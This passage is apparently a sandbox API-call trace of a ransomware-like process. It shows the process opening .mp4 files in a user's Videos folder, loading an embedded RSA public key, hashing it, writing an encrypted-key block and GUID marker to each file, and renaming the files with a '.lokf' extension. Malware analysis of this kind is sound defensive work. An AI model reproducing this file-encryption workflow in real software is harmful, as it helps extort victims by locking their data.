halpmcxz\\videos\\jysvlz\\7_vc_tyf-w1fe3j1gz.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0060.212] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=90447) returned 1 [0060.212] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0060.214] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x16129, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.214] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0060.215] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0060.215] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0060.215] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0060.215] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x1614f, lpOverlapped=0x0) returned 1 [0060.216] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.216] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0060.216] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.216] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.216] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8478) returned 1 [0060.216] CryptCreateHash (in: hProv=0x6b8478, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0060.216] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0060.216] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0060.216] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0060.216] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0060.217] GetLastError () returned 0x0 [0060.217] CryptDestroyHash (hHash=0x327cb80) returned 1 [0060.217] CryptReleaseContext (hProv=0x6b8478, dwFlags=0x0) returned 1 [0060.217] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0060.217] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0060.217] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0060.217] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0060.217] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0060.217] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0060.217] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0060.217] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x16150) returned 0x9c8bae8 [0060.217] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0060.217] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0060.217] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32995a0 [0060.217] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0060.217] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32afc78 [0060.217] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x3296380 [0060.217] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c88e60 [0060.217] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85c20 [0060.217] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c88ea8 [0060.217] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85c38 [0060.218] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85c68 [0060.218] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857b8 [0060.218] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85c80 [0060.218] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x24) returned 0x32a08a0 [0060.218] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x158) returned 0x9c78728 [0060.218] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0060.218] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x3297a68 [0060.218] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85c68 | out: hHeap=0x660000) returned 1 [0060.218] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85c80 | out: hHeap=0x660000) returned 1 [0060.218] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857b8 | out: hHeap=0x660000) returned 1 [0060.218] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32a08a0 | out: hHeap=0x660000) returned 1 [0060.218] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3297a68 | out: hHeap=0x660000) returned 1 [0060.218] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857b8 [0060.218] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278e90 [0060.218] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85c80 [0060.218] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x3242348 [0060.218] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x9) returned 0x9c85c68 [0060.218] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f10 [0060.218] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10e) returned 0x3234418 [0060.218] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0060.218] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x32964a0 [0060.218] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242688 [0060.218] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x104) returned 0x32452d8 [0060.218] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x32425c8 [0060.218] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0060.218] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0060.218] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85c80 | out: hHeap=0x660000) returned 1 [0060.218] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0060.218] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85c68 | out: hHeap=0x660000) returned 1 [0060.218] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242348 | out: hHeap=0x660000) returned 1 [0060.218] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0060.218] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857b8 | out: hHeap=0x660000) returned 1 [0060.218] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0060.218] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3296380 | out: hHeap=0x660000) returned 1 [0060.218] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0060.218] GetCurrentThreadId () returned 0x9e0 [0060.219] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f4e8 [0060.219] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x82) returned 0x9c8a130 [0060.219] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2c) returned 0x3257198 [0060.219] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8478 [0060.219] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x148) returned 0x3201228 [0060.219] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0060.219] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0060.219] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f908 [0060.219] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.219] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.219] GetCurrentThreadId () returned 0x9e0 [0060.219] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.219] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.219] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xeb) returned 0x329e1f0 [0060.219] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.219] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.219] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.219] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.219] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329e1f0 | out: hHeap=0x660000) returned 1 [0060.219] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f800 [0060.219] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0060.219] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4c) returned 0x3261528 [0060.219] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0060.219] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f6f8 [0060.219] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0060.219] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857b8 [0060.219] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0060.219] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0060.219] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f50 [0060.219] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f00 [0060.219] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f20 [0060.219] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0060.219] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0060.219] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0060.219] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85c68 [0060.220] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0060.220] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f50 [0060.220] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0060.220] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0060.220] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278fa0 [0060.220] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f80 [0060.220] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f90 [0060.220] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85c80 [0060.220] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f80 | out: hHeap=0x660000) returned 1 [0060.220] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x3242348 [0060.220] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278fa0 | out: hHeap=0x660000) returned 1 [0060.220] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85c50 [0060.220] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f90 | out: hHeap=0x660000) returned 1 [0060.220] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x1614f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.220] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f4e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f4e8*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0060.220] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f4e8 | out: hHeap=0x660000) returned 1 [0060.221] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0060.221] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0060.221] CloseHandle (hObject=0x5cc) returned 1 [0060.222] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jYsvlZ\\7_vc_tYF-W1fe3j1GZ.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\jysvlz\\7_vc_tyf-w1fe3j1gz.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jYsvlZ\\7_vc_tYF-W1fe3j1GZ.mp4.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\jysvlz\\7_vc_tyf-w1fe3j1gz.mp4.lokf")) returned 1 [0060.222] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0060.222] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0060.222] VirtualFree (lpAddress=0x3700000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.223] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adb18 | out: hHeap=0x660000) returned 1 [0060.223] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe72cf340, ftCreationTime.dwHighDateTime=0x1d4d13d, ftLastAccessTime.dwLowDateTime=0x93f0e5a0, ftLastAccessTime.dwHighDateTime=0x1d4d07b, ftLastWriteTime.dwLowDateTime=0x93f0e5a0, ftLastWriteTime.dwHighDateTime=0x1d4d07b, nFileSizeHigh=0x0, nFileSizeLow=0x3737, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Ln9Eeh629DhOIJi1iM_F.mp4", cAlternateFileName="LN9EEH~1.MP4")) returned 1 [0060.223] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jYsvlZ\\Ln9Eeh629DhOIJi1iM_F.mp4") returned=".mp4" [0060.224] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jYsvlZ\\Ln9Eeh629DhOIJi1iM_F.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\jysvlz\\ln9eeh629dhoiji1im_f.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0060.224] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=14135) returned 1 [0060.224] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0060.226] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x3711, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.226] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0060.227] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x3737, lpOverlapped=0x0) returned 1 [0060.227] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.227] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.227] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.227] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8478) returned 1 [0060.228] CryptCreateHash (in: hProv=0x6b8478, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0060.228] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0060.228] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0060.228] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0060.228] GetLastError () returned 0x0 [0060.228] CryptDestroyHash (hHash=0x327cb80) returned 1 [0060.228] CryptReleaseContext (hProv=0x6b8478, dwFlags=0x0) returned 1 [0060.228] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0060.228] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0060.228] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0060.228] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0060.228] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0060.228] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0060.228] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x3297a68 [0060.228] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85c80 | out: hHeap=0x660000) returned 1 [0060.228] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85c98 | out: hHeap=0x660000) returned 1 [0060.228] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857d0 | out: hHeap=0x660000) returned 1 [0060.228] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32a08a0 | out: hHeap=0x660000) returned 1 [0060.228] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3297a68 | out: hHeap=0x660000) returned 1 [0060.228] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857d0 [0060.229] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f60 [0060.229] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85c98 [0060.229] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x32425c8 [0060.229] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x9) returned 0x9c85c80 [0060.229] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f40 [0060.229] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10e) returned 0x3234418 [0060.229] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0060.229] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x3296380 [0060.229] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242688 [0060.229] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x104) returned 0x32452d8 [0060.229] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242348 [0060.229] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0060.229] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0060.229] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85c98 | out: hHeap=0x660000) returned 1 [0060.229] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0060.229] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85c80 | out: hHeap=0x660000) returned 1 [0060.229] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x3737, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.229] WriteFile (in: hFile=0x5cc, 